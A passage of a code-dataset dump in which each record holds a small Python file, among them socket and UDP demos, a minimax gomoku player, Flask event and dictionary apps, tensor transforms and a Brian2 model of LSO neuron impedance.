color)\n","sub_path":"i3widgets/widgets/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"497327897","text":"\"\"\"\n非阻塞IO演示\n\"\"\"\n\nfrom socket import *\nfrom time import sleep,ctime\n\n# 创建tcp套接字\nsockfd = socket()\nsockfd.bind((\"0.0.0.0\",8888))\nsockfd.listen(5)\n\nfile = open(\"my.log\",'a') # 日志文件\n\n# 
设置套接字为非阻塞\n# sockfd.setblocking(False)\n\n# 设置超时检测\nsockfd.settimeout(3)\n\nwhile True:\n print(\"Waiting for connect\")\n # 阻塞位置\n try:\n connfd,addr = sockfd.accept()\n print(\"Connect from\",addr)\n except BlockingIOError as e:\n # 没有客户端连接\n sleep(2)\n msg = \"%s: %s\\n\"%(ctime(),e)\n file.write(msg)\n except timeout as e:\n msg = \"%s: %s\\n\" % (ctime(), e)\n file.write(msg)\n else:\n data = connfd.recv(1024)\n print(data.decode())\n","sub_path":"month02/day16/block_io.py","file_name":"block_io.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515672065","text":"#!/usr/bin/env python3\n\nfrom board import Board2dArr as Board\n\n\nclass BrainMinimax(object):\n\n def __init__(self, board_size, max_minimax_depth=2):\n if board_size < 1:\n raise ValueError('Unsupported board size')\n self.board_size = board_size\n self.board = Board(board_size)\n self.max_minimax_depth = max_minimax_depth\n\n def update_state(self, p, x, y):\n # note that player p has made a move at coordinate x, y\n if p != 1 and p != 2:\n raise ValueError('p must be 1 or 2, got:', p)\n self.board.update(p, x, y)\n\n def make_move(self):\n # return coordinates at which this player wants to make a move\n if len(self.board) == 0:\n # empty board\n # pick a move by simple heuristics\n x, y = self.opening_move()\n else:\n # board has moves on it\n # use minimax algorithm\n x, y = self.find_best_move()\n self.update_state(1, x, y)\n # print(self.board)\n # print(self.board.board_cols)\n return x, y\n\n def undo_state(self, x, y):\n self.board.update(0, x, y)\n\n def find_best_move(self):\n # find the best move that should be made next\n best = max(((x, y) for (x, y) in self.next_moves()),\n key=lambda move: self.simulate_move(move[0], move[1], self.minimax, \n True, 0, float('-inf'), float('inf')))\n return best\n\n def minimax(self, max_turn, curr_depth, alpha, beta):\n # use minimax algorithm to find best move\n # optimized with alpha-beta pruning\n if curr_depth == self.max_minimax_depth:\n # terminal state (base case)\n return self.evaluation_function()\n\n # recursive case\n if max_turn:\n # maximizer's turn\n opt = max # optimization function\n guess = float('-inf') # initial value for score\n else:\n # minimizer's turn\n opt = min\n guess = float('inf')\n\n best_score = guess # initialize guess\n for x, y in self.next_moves():\n best_score = self.simulate_move(x, y, \n lambda args: opt(args[0], self.minimax(*args[1:])),\n (best_score, False, curr_depth+1, alpha, beta))\n if max_turn:\n # choose which local pruning variable to update\n alpha = opt(best_score, alpha)\n else:\n beta = opt(best_score, beta)\n\n if beta <= alpha:\n # alpha-beta prune\n break\n\n return best_score\n\n def simulate_move(self, x, y, callback, *args):\n # do a move (as own player), call callback, undo move\n # return callback's value\n # use internal board state structure\n # do not copy for memory efficiency\n self.update_state(1, x, y)\n val = callback(*args)\n self.undo_state(x, y)\n return val\n\n def next_moves(self):\n # return a generator of possible next moves\n for (x, y) in self.board.next_moves_neighbour(-1):\n # print('check move: {},{}'.format(x, y), flush=True, end=', ')\n yield (x, y)\n # print('', flush=True)\n\n def opening_move(self):\n # return a move for an empty board\n return self.board.middle_move()\n\n def evaluation_function(self):\n # TODO idea: evaluation function for a single move (not the entire board???)\n return 
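# Hedged sketch: BrainMinimax here implements depth-limited minimax with
# alpha-beta pruning through simulate_move callbacks. The same control flow on
# an abstract game tree, stripped of the board plumbing:
def minimax(state, depth, alpha, beta, maximizing, children, evaluate):
    kids = children(state)
    if depth == 0 or not kids:
        return evaluate(state)              # depth cutoff / terminal state
    best = float('-inf') if maximizing else float('inf')
    opt = max if maximizing else min
    for child in kids:
        score = minimax(child, depth - 1, alpha, beta,
                        not maximizing, children, evaluate)
        best = opt(best, score)
        if maximizing:
            alpha = max(alpha, best)        # raise the maximizer's floor
        else:
            beta = min(beta, best)          # lower the minimizer's ceiling
        if beta <= alpha:
            break                           # prune: the opponent avoids this branch
    return best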
self.board.evaluate()\n","sub_path":"year3_1920/epitech/minimax_gomoku/brain_minimax.py","file_name":"brain_minimax.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487489600","text":"from flask import request, jsonify\nfrom . import api\nfrom .response import response\nfrom app.auth.user_handler import get_uid\nfrom app.controller import event_controller as ec\n\nID = 1\nNAME = '王大明'\nprefix = 'event'\n\n\n@api.route('%s' % prefix, methods=['POST'])\ndef create_event():\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.create(request.form, get_uid())\n return jsonify(result), 200\n\n\n@api.route('%s' % prefix, methods=['GET'])\ndef index_event():\n result = ec.index()\n return jsonify(result), 200\n\n\n@api.route('%s/' % prefix, methods=['GET'])\ndef show_event(eid):\n result = ec.show(eid)\n return jsonify(result), 200\n\n\n@api.route('%s/' % prefix, methods=['PATCH'])\ndef update_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.update(eid, request.form, get_uid())\n if result == 403:\n return response(403, message='current user is not the author')\n elif result == 402:\n return response(402, message='patch content error')\n elif result is not None:\n return jsonify(result), 200\n else:\n return {'message': 'PATCH failed'}, 402\n\n\n@api.route('%s/' % prefix, methods=['DELETE'])\ndef delete_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.destroy(eid, get_uid())\n if result == 403:\n return response(403, message='current user is not the author')\n else:\n return '', 204\n\n\n@api.route('%s//follow' % prefix, methods=['POST'])\ndef follow_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n return '', ec.follow(eid, get_uid())\n\n\n@api.route('%s//follow' % prefix, methods=['DELETE'])\ndef delete_follow_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n return '', ec.destroy_follow(eid, get_uid())\n","sub_path":"app/api/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"106564344","text":"\"\"\"\nUDP应用\n即时消息发送\n丢包率\n\n使用udp协议做socket\n两个socket对象之间通信\n\"\"\"\nimport socket\ns=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.bind((\"127.0.0.1\",8888))\n\n# udp中不需要下面两个方法\n# s.listen()\n# s.accept()\n\n# 接受信息\nprint(s.recv(1024).decode())\n","sub_path":"python1808real/day20/day20-1-udpserver.py","file_name":"day20-1-udpserver.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"589212415","text":"import numpy as np\nimport torch\nfrom .base import Transform\n\n\nclass Normalize(Transform):\n \"\"\"Normalizes input to zero mean unit variance.\"\"\"\n def __init__(self, eps=1e-4, **super_kwargs):\n \"\"\"\n Parameters\n ----------\n eps : float\n A small epsilon for numerical stability.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(Normalize, self).__init__(**super_kwargs)\n self.eps = eps\n\n def tensor_function(self, tensor):\n tensor = (tensor - tensor.mean())/(tensor.std() + self.eps)\n return tensor\n\n\nclass NormalizeRange(Transform):\n 
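# Hedged sketch: the Normalize transform above maps a tensor to zero mean and
# unit variance with an epsilon guard against zero std. Checking the effect:
import torch

x = torch.randn(4, 3) * 5 + 2            # arbitrary scale and offset
z = (x - x.mean()) / (x.std() + 1e-4)    # same formula as tensor_function
print(z.mean().item(), z.std().item())   # ~0.0 and ~1.0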
\"\"\"Normalizes input by a constant.\"\"\"\n def __init__(self, normalize_by=255., **super_kwargs):\n \"\"\"\n Parameters\n ----------\n normalize_by : float or int\n Scalar to normalize by.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(NormalizeRange, self).__init__(**super_kwargs)\n self.normalize_by = float(normalize_by)\n\n def tensor_function(self, tensor):\n return tensor / self.normalize_by\n\n\nclass Cast(Transform):\n \"\"\"Casts inputs to a specified datatype.\"\"\"\n DTYPE_MAPPING = {'float32': 'float32',\n 'float': 'float32',\n 'double': 'float64',\n 'float64': 'float64',\n 'half': 'float16',\n 'float16': 'float16'}\n\n def __init__(self, dtype='float', **super_kwargs):\n \"\"\"\n Parameters\n ----------\n dtype : {'float16', 'float32', 'float64', 'half', 'float', 'double'}\n Datatype to cast to.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(Cast, self).__init__(**super_kwargs)\n assert dtype in self.DTYPE_MAPPING.keys()\n self.dtype = self.DTYPE_MAPPING.get(dtype)\n\n def tensor_function(self, tensor):\n return getattr(np, self.dtype)(tensor)\n\n\nclass AsTorchBatch(Transform):\n \"\"\"Converts a given numpy array to a torch batch tensor.\n\n The result is a torch tensor __without__ the leading batch axis. For example,\n if the input is an image of shape `(100, 100)`, the output is a batch of shape\n `(1, 100, 100)`. The collate function will add the leading batch axis to obtain\n a tensor of shape `(N, 1, 100, 100)`, where `N` is the batch-size.\n \"\"\"\n def __init__(self, dimensionality, **super_kwargs):\n \"\"\"\n Parameters\n ----------\n dimensionality : {1, 2, 3}\n Dimensionality of the data: 1 if vector, 2 if image, 3 if volume.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(AsTorchBatch, self).__init__(**super_kwargs)\n assert dimensionality in [1, 2, 3]\n self.dimensionality = dimensionality\n\n def tensor_function(self, tensor):\n assert isinstance(tensor, np.ndarray)\n if self.dimensionality == 3:\n # We're dealing with a volume. tensor can either be 3D or 4D\n assert tensor.ndim in [3, 4]\n if tensor.ndim == 3:\n # Add channel axis\n return torch.from_numpy(tensor[None, ...])\n else:\n # Channel axis is in already\n return torch.from_numpy(tensor)\n elif self.dimensionality == 2:\n # We're dealing with an image. 
tensor can either be 2D or 3D\n assert tensor.ndim in [2, 3]\n if tensor.ndim == 2:\n # Add channel axis\n return torch.from_numpy(tensor[None, ...])\n else:\n # Channel axis is in already\n return torch.from_numpy(tensor)\n elif self.dimensionality == 1:\n # We're dealing with a vector - it has to be 1D\n assert tensor.ndim == 1\n return torch.from_numpy(tensor)\n else:\n raise NotImplementedError\n","sub_path":"inferno/io/transform/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"527134753","text":"from flask import Flask, render_template\r\nimport random\r\napp = Flask(__name__)\r\n\r\n\r\n \r\n\r\n@app.route(\"/dictionary/\")\r\ndef dictionary(word):\r\n dict = {'apple':'사과','kid':'아이','cloth':'천','book':'책'}\r\n \r\n result = dict.get(word)\r\n if result:\r\n result = f\"{word}는 {result}입니다.\"\r\n else:\r\n result = f\"{word}는 단어장에 없는 단어입니다.\"\r\n \r\n return render_template(\"dictionary.html\",result=result)\r\n \r\n # if word in dict.keys():\r\n # mean = dict[word]\r\n # else:\r\n # mean = \"나만의 단어장에 없음\"\r\n\r\n # return render_template(\"dictionary.html\", word=word, mean=mean)\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True,host=\"0.0.0.0\",port=8080)","sub_path":"workshop/workshop8/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"622959863","text":"from mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nfrom graphviz import Digraph\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\nfrom mscatter import mscatter\nimport numpy as np\n\n\nclass Network:\n def __init__(self, in_neurons=list(), out_neurons=list()):\n self.in_neurons = in_neurons\n self.out_neurons = out_neurons\n\n for in_neuron in self.in_neurons:\n in_neuron.outs = list() # why is this necessary?\n for out_neuron in self.out_neurons:\n in_neuron.project_to(out_neuron)\n\n def update_inputs(self, activations):\n for i in range(len(activations)):\n self.in_neurons[i].activation = activations[i]\n\n def print_ins(self):\n out_str = \"Inputs: \"\n\n for neuron in self.in_neurons:\n out_str += str(neuron.activation) + \" \"\n\n print(out_str)\n\n def draw_network(self):\n '''\n dot = Digraph()\n dot.node('A', 'A')\n dot.node('B', 'B')\n dot.node('C', 'C')\n dot.edges(['AB', 'AB', 'AB', 'BC', 'BA', 'CB'])\n\n print(dot.source)\n dot.render(\"graph.png\", view=True)\n '''\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n\n xdata = []\n ydata = []\n zdata = []\n mdata = []\n adata = []\n\n neurons = self.in_neurons.copy()\n neurons.extend(self.out_neurons)\n\n for neuron in neurons:\n xdata.append(neuron.pos[0])\n ydata.append(neuron.pos[1])\n zdata.append(neuron.pos[2])\n if neuron.is_input:\n mdata.append('x')\n elif neuron.is_output:\n mdata.append('o')\n adata.append(neuron.activation)\n\n xdata.append(0) # Dummy 1 neuron\n ydata.append(0)\n zdata.append(0)\n adata.append(1)\n mdata.append('^')\n\n xdata.append(0) # Dummy 0 neuron\n ydata.append(0)\n zdata.append(0)\n adata.append(0)\n mdata.append('^')\n\n mscatter(xdata, ydata, zdata, m=mdata, c=adata, cmap='plasma')\n\n for neuron in neurons:\n for projected in neuron.outs:\n n1 = neuron.pos[0]\n n2 = neuron.pos[1]\n n3 = neuron.pos[2]\n p1 = projected.pos[0]\n p2 = projected.pos[1]\n p3 = projected.pos[2]\n ax.plot([n1, p1], 
[n2, p2], [n3, p3], color='Grey')\n\n plt.show()\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"75700330","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDownloaded from Brian2 website on Sat Jan 13 10:02:04 2018\n\nCochlear neuron model of Rothman & Manis\n----------------------------------------\nRothman JS, Manis PB (2003) The roles potassium currents play in\nregulating the electrical activity of ventral cochlear nucleus neurons.\nJ Neurophysiol 89:3097-113.\n\nAll model types differ only by the maximal conductances.\n\nAdapted from their Neuron implementation by Romain Brette\n\"\"\"\n#from brian2 import *\nfrom brian2 import mV, pA, pF, nS, ms, second, Hz\nfrom brian2 import NeuronGroup\nfrom brian2 import StateMonitor, run\nfrom brian2 import defaultclock\nfrom math import exp\nimport numpy as np\nimport matplotlib.pyplot as plt\n#from matplotlib.ticker import ScalarFormatter\n#for axis in [ax.xaxis, ax.yaxis]:\n# axis.set_major_formatter(ScalarFormatter())\n \ndefaultclock.dt=0.02*ms # for better precision\n\n'''\nSimulation parameters: choose current amplitude and neuron type\n(from type1c, type1t, type12, type 21, type2, type2o)\n'''\nneuron_type = 'LsoNp1b'\nnLsons = 1 # number of LSO neurons\ntemp_degC=22.\nVrest = -62.5*mV # observed resting potential for model LsoNp1b\n\nC = 12*pF # 21.7pF: non-principal LSO neuron (Barnes-Davies et al. 2004)\nEh = -43*mV\nEK = -70*mV # -77*mV in mod file\nEl = -65*mV\nENa = 50*mV\nnf = 0.85 # proportion of n vs p kinetics\nzss = 0.5 # steady state inactivation of glt\nq10 = 3. ** ((temp_degC - 22) / 10.)\n# hcno current (octopus cell)\nfrac = 0.0\nqt = 4.5 ** ((temp_degC - 33.) / 10.)\n\n# Maximal conductances of different cell types in nS\nmaximal_conductances = dict(\nLsoNp1b=(2000, 300, 0, 0, 24, 0, 24),\ntype1c=(1000, 150, 0, 0, 0.5, 0, 2),\ntype1t=(1000, 80, 0, 65, 0.5, 0, 2),\ntype12=(1000, 150, 20, 0, 2, 0, 2),\ntype21=(1000, 150, 35, 0, 3.5, 0, 2),\ntype2=(1000, 150, 200, 0, 20, 0, 2),\ntype2g2x=(2000, 300, 400, 0, 40, 0, 2),\ntype2g1p5x=(1000, 150, 300, 0, 30, 0, 2),\ntype2g1p2x=(1200, 180, 240, 0, 24, 0, 2),\ntype2g0p5x=(1000, 150, 100, 0, 10, 0, 2),\ntype2o=(1000, 150, 600, 0, 0, 40, 2) # octopus cell\n)\ngnabar, gkhtbar, gkltbar, gkabar, ghbar, gbarno, gl = [x * nS for x in maximal_conductances[neuron_type]]\n\n# Classical Na channel\neqs_na = \"\"\"\nina = gnabar*m**3*h*(ENa-v) : amp\ndm/dt=q10*(minf-m)/mtau : 1\ndh/dt=q10*(hinf-h)/htau : 1\nminf = 1./(1+exp(-(vu + 38.) / 7.)) : 1\nhinf = 1./(1+exp((vu + 65.) / 6.)) : 1\nmtau = ((10. / (5*exp((vu+60.) / 18.) + 36.*exp(-(vu+60.) / 25.))) + 0.04)*ms : second\nhtau = ((100. / (7*exp((vu+60.) / 11.) + 10.*exp(-(vu+60.) / 25.))) + 0.6)*ms : second\n\"\"\"\n\n# KHT channel (delayed-rectifier K+)\neqs_kht = \"\"\"\nikht = gkhtbar*(nf*n**2 + (1-nf)*p)*(EK-v) : amp\ndn/dt=q10*(ninf-n)/ntau : 1\ndp/dt=q10*(pinf-p)/ptau : 1\nninf = (1 + exp(-(vu + 15) / 5.))**-0.5 : 1\npinf = 1. / (1 + exp(-(vu + 23) / 6.)) : 1\nntau = ((100. / (11*exp((vu+60) / 24.) + 21*exp(-(vu+60) / 23.))) + 0.7)*ms : second\nptau = ((100. / (4*exp((vu+60) / 32.) + 5*exp(-(vu+60) / 22.))) + 5)*ms : second\n\"\"\"\n\n# Ih channel (subthreshold adaptive, non-inactivating)\neqs_ih = \"\"\"\nih = ghbar*r*(Eh-v) : amp\ndr/dt=q10*(rinf-r)/rtau : 1\nrinf = 1. / (1+exp((vu + 76.) / 7.)) : 1\nrtau = ((100000. / (237.*exp((vu+60.) / 12.) + 17.*exp(-(vu+60.) 
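# Hedged sketch: the model above scales 22-degree-C channel kinetics with a Q10
# temperature factor, q10 = 3 ** ((temp_degC - 22) / 10). Worked values:
def q10_factor(temp_c, q10=3.0, t_ref=22.0):
    return q10 ** ((temp_c - t_ref) / 10.0)

print(q10_factor(22.0))   # 1.0 at the reference temperature
print(q10_factor(32.0))   # 3.0 -> gating runs three times faster 10 C warmer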
/ 14.))) + 25.)*ms : second\n\"\"\"\n\n# KLT channel (low threshold K+)\neqs_klt = \"\"\"\niklt = gkltbar*w**4*z*(EK-v) : amp\ndw/dt=q10*(winf-w)/wtau : 1\ndz/dt=q10*(zinf-z)/wtau : 1\nwinf = (1. / (1 + exp(-(vu + 48.) / 6.)))**0.25 : 1\nzinf = zss + ((1.-zss) / (1 + exp((vu + 71.) / 10.))) : 1\nwtau = ((100. / (6.*exp((vu+60.) / 6.) + 16.*exp(-(vu+60.) / 45.))) + 1.5)*ms : second\nztau = ((1000. / (exp((vu+60.) / 20.) + exp(-(vu+60.) / 8.))) + 50)*ms : second\n\"\"\"\n\n# Ka channel (transient K+)\neqs_ka = \"\"\"\nika = gkabar*a**4*b*c*(EK-v): amp\nda/dt=q10*(ainf-a)/atau : 1\ndb/dt=q10*(binf-b)/btau : 1\ndc/dt=q10*(cinf-c)/ctau : 1\nainf = (1. / (1 + exp(-(vu + 31) / 6.)))**0.25 : 1\nbinf = 1. / (1 + exp((vu + 66) / 7.))**0.5 : 1\ncinf = 1. / (1 + exp((vu + 66) / 7.))**0.5 : 1\natau = ((100. / (7*exp((vu+60) / 14.) + 29*exp(-(vu+60) / 24.))) + 0.1)*ms : second\nbtau = ((1000. / (14*exp((vu+60) / 27.) + 29*exp(-(vu+60) / 24.))) + 1)*ms : second\nctau = ((90. / (1 + exp((-66-vu) / 17.))) + 10)*ms : second\n\"\"\"\n\n# Leak\neqs_leak = \"\"\"\nileak = gl*(El-v) : amp\n\"\"\"\n\n# h current for octopus cells\neqs_hcno = \"\"\"\nihcno = gbarno*(h1*frac + h2*(1-frac))*(Eh-v) : amp\ndh1/dt=(hinfno-h1)/tau1 : 1\ndh2/dt=(hinfno-h2)/tau2 : 1\nhinfno = 1./(1+exp((vu+66.)/7.)) : 1\ntau1 = bet1/(qt*0.008*(1+alp1))*ms : second\ntau2 = bet2/(qt*0.0029*(1+alp2))*ms : second\nalp1 = exp(1e-3*3*(vu+50)*9.648e4/(8.315*(273.16+temp_degC))) : 1\nbet1 = exp(1e-3*3*0.3*(vu+50)*9.648e4/(8.315*(273.16+temp_degC))) : 1 \nalp2 = exp(1e-3*3*(vu+84)*9.648e4/(8.315*(273.16+temp_degC))) : 1\nbet2 = exp(1e-3*3*0.6*(vu+84)*9.648e4/(8.315*(273.16+temp_degC))) : 1\n\"\"\"\n\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#I = I_Bias: amp\n#\"\"\"\neqs = \"\"\"\ndv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\nvu = v/mV : 1 # unitless v\nI = I_Bias + I_Zap_Max * sin(2*pi*(m1000*(t - (t_settle+t_bias)) + f_min) * (t - (t_settle+t_bias))) : amp\n#\"\"\"\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#if (t_settle <= t < (t_settle + sweepdur)):\n# I = I_Bias + I_Zap_Max * sin(2*pi*(m1000*(t - t_settle) + f_min) * (t - t_settle)): amp\n#else:\n# I = 0: amp\n#\n#\"\"\"\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#if (t_settle <= t < (t_settle + sweepdur)):\n# I = I_Bias: amp\n#else:\n# I = 0: amp\n#\n#\"\"\"\neqs += eqs_leak + eqs_ka + eqs_na + eqs_ih + eqs_klt + eqs_kht + eqs_hcno\n\n#neuron = NeuronGroup(1, eqs, method='exponential_euler')\n#neuron.v = El\n\nlsonGrp = NeuronGroup(nLsons, eqs, method='exponential_euler')\n# Initialize model near v_rest with no inputs\nlsonGrp.v = Vrest\n#vu = EL/mV # unitless v\nvu = lsonGrp.v/mV # unitless v\nlsonGrp.m = 1./(1+exp(-(vu + 38.) / 7.))\nlsonGrp.h = 1./(1+exp((vu + 65.) / 6.))\nlsonGrp.n = (1 + exp(-(vu + 15) / 5.))**-0.5\nlsonGrp.p = 1. / (1 + exp(-(vu + 23) / 6.))\nlsonGrp.r = 1. / (1+exp((vu + 76.) / 7.))\nlsonGrp.w = (1. / (1 + exp(-(vu + 48.) / 6.)))**0.25\nlsonGrp.z = zss + ((1.-zss) / (1 + exp((vu + 71.) / 10.)))\nlsonGrp.a = (1. / (1 + exp(-(vu + 31) / 6.)))**0.25\nlsonGrp.b = 1. / (1 + exp((vu + 66) / 7.))**0.5\nlsonGrp.c = 1. 
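# Hedged sketch: the surrounding lsonGrp initialization sets every gating
# variable to its voltage-dependent steady state at Vrest, which avoids a
# settling transient at t = 0. For the sodium gates at vu = -62.5 mV:
from math import exp

vu = -62.5                                # unitless membrane potential in mV
minf = 1. / (1 + exp(-(vu + 38.) / 7.))   # same expressions as in eqs_na
hinf = 1. / (1 + exp((vu + 65.) / 6.))
print(round(minf, 4), round(hinf, 4))     # ~0.0293 and ~0.3973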
/ (1 + exp((vu + 66) / 7.))**0.5\nlsonGrp.h1 = 1./(1+exp((vu+66.)/7.))\nlsonGrp.h2 = 1./(1+exp((vu+66.)/7.))\n\n#I_Gate = 1\n# Current input / Zap frequency-sweep parameters\nI_Bias = 0*pA\nI_Zap_Max = 0*pA\nsweepdur = 1*second\n#sweepdur_ms = 960*ms\n#f_max = 100*Hz\nf_max = 2000*Hz\nf_min = 1*Hz\nm1000 = (f_max - f_min)/(2*(sweepdur - defaultclock.dt))\nt_settle = 50*ms\nt_bias = 450*ms\n#zap1000_0p96 = I_Zap_Max * sin(2*pi*(m1000*(t - t_settle) + f_min) * (t - t_settle));\n\n#M = StateMonitor(lsonGrp, 'v', record=True)\nM = StateMonitor(lsonGrp, ['v','I'], record=True)\nrun(t_settle, report='text') # Go to rest\n\nI_Bias = 100.*pA\nrun(t_bias, report='text') # Equilibrate to I_Bias\nIBiasStr = 'IBias' + str(int(I_Bias/pA)) + 'pA'\n\nI_Zap_Max = 10*pA\nrun(sweepdur, report='text') # Apply Zap current\nIZapMaxStr = 'IZapMax' + str(int(I_Zap_Max/pA)) + 'pA'\n\nI_Zap_Max = 0.*pA\nrun(100*ms, report='text')\n\nfftStart = round((t_settle + t_bias)/defaultclock.dt)\nfftStop = round((t_settle + t_bias + sweepdur)/defaultclock.dt)\nVfft = np.fft.fft(M[0].v[fftStart:fftStop])\nIfft = np.fft.fft(M[0].I[fftStart:fftStop])\nZfft = np.divide(Vfft, Ifft)\n\n#plt.plot(M.t / ms, M[0].v / mV)\nplt.plot(M.t / ms, M[0].v / mV)\nplt.xlabel('t (ms)')\nplt.ylabel('v (mV)')\n#plt.ylim((-65,-45))\nplt.show()\n\n#plt.plot(range(5,90),abs(Vfft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.semilogx(range(10,1000),abs(Vfft[10:1000])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.show()\n\n#plt.plot(range(5,90),abs(Ifft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.semilogx(range(10,1000),abs(Ifft[10:1000])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.show()\n\n##plt.plot(range(5,90),abs(Zfft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\n##plt.rcParams.update({'font.size': 18})\n#plt.ylabel('impedance (MOhm)', fontsize=18)\n#plt.xlabel('frequency (Hz)', fontsize=18)\n#plt.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6) # For now, 1-Hz resolution, drop 0 Hz (large DC)\n#plt.ylim((0,200e6))\n#plt.show()\n\ntimeVmemFileStr = 'timeVmemNp1bb_' + IBiasStr + '_' + IZapMaxStr + '.txt'\nfile9 = open(timeVmemFileStr,'w')\nfor index in range(len(M.t)):\n file9.write(str(M.t[index] / ms) + \" \" + str(M[0].v[index] / mV) + '\\n')\nfile9.close()\n\nZfft_CoreFileStr = 'ZfftNp1bb_' + IBiasStr + '_' + IZapMaxStr\nabsZfft_CoreFileStr = 'absZfftNp1bb_' + IBiasStr + '_' + IZapMaxStr\nfile10 = open(Zfft_CoreFileStr + '.txt','w')\nfile11 = open(absZfft_CoreFileStr + '.txt','w')\nfor index in range(len(Zfft)):\n file10.write(str((index/len(Zfft)) * (1/defaultclock.dt)/Hz) + \" \" + str(Zfft[index]) + '\\n')\n file11.write(str((index/len(Zfft)) * (1/defaultclock.dt)/Hz) + \" \" + str(abs(Zfft[index])) + '\\n')\nfile10.close()\nfile11.close()\n\nfig_absZ_Np1bb, ax = plt.subplots(1, 1)\nax.set_title('model LSO nrn Np1b (22C,0.45-s pre-bias)', fontsize=16)\nax.set_ylabel('impedance (MOhm)', fontsize=16)\nax.set_xlabel('frequency (Hz)', fontsize=16)\nax.set_ylim((0,80))\nax.tick_params(axis='both', which='major', labelsize=16)\nax.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6, linewidth=2.0)\nfig_absZ_Np1bb.tight_layout()\nfig_absZ_Np1bb.savefig(absZfft_CoreFileStr + '.png', dpi=300)\n\n#fig_out, ax = plt.subplots(1, 1)\n#ax.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6, linewidth=2.0, alpha=0.3, color='gray')\n#inch = 2.54\n#fig_out.subplots_adjust(wspace=0.3, hspace=0.5)\n#fig_out.set_size_inches(12.0/inch, 4.0 * 
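# Hedged sketch (toy numbers, not the model's output): the script here estimates
# impedance as Z(f) = FFT(V) / FFT(I) over the zap window. The same computation
# on a synthetic 10 Hz current/voltage pair:
import numpy as np

dt = 2e-5                                   # 0.02 ms, the defaultclock step above
t = np.arange(0.0, 1.0, dt)
i = 1e-11 * np.sin(2 * np.pi * 10 * t)      # 10 pA current
v = 1e-3 * np.sin(2 * np.pi * 10 * t)       # 1 mV response
freqs = np.fft.fftfreq(len(t), dt)
k = np.argmin(np.abs(freqs - 10))           # bin nearest 10 Hz
Z = np.fft.fft(v)[k] / np.fft.fft(i)[k]
print(abs(Z) / 1e6, "MOhm")                 # 100.0 -> |Z| = 100 MOhm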
len(electrodes)/inch)\n#fig_out.tight_layout()\n#fig_out.savefig(figures_path + 'ci_el_disc_fast_time_domain.pdf', dpi=300)\n#fig_out.savefig(figures_path + 'ci_el_disc_fast_time_domain.png', dpi=300)\n\n","sub_path":"04kHz/ZmagNp1bbShortSettle.py","file_name":"ZmagNp1bbShortSettle.py","file_ext":"py","file_size_in_byte":9965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"629186466","text":"#!/usr/bin/env python3\n\"\"\"\nBoard Game Record Keeper\n\n@author: Roman\n@version: 2022.11\n\"\"\"\n\nfrom csv import DictReader\nfrom functools import cache\nfrom os import environ\n\nimport requests\nfrom dotenv import load_dotenv\nfrom flask import (\n Flask,\n jsonify,\n make_response,\n redirect,\n render_template,\n request,\n session,\n url_for,\n)\n\n\n@cache\ndef read_data_file(filename):\n all_games = {}\n with open(filename) as datafile:\n for record in DictReader(datafile):\n all_games[record[\"title\"]] = record\n return all_games\n\n\ndef create_app():\n app = Flask(__name__)\n load_dotenv()\n app.config.from_prefixed_env()\n app.config[\"all_games\"] = 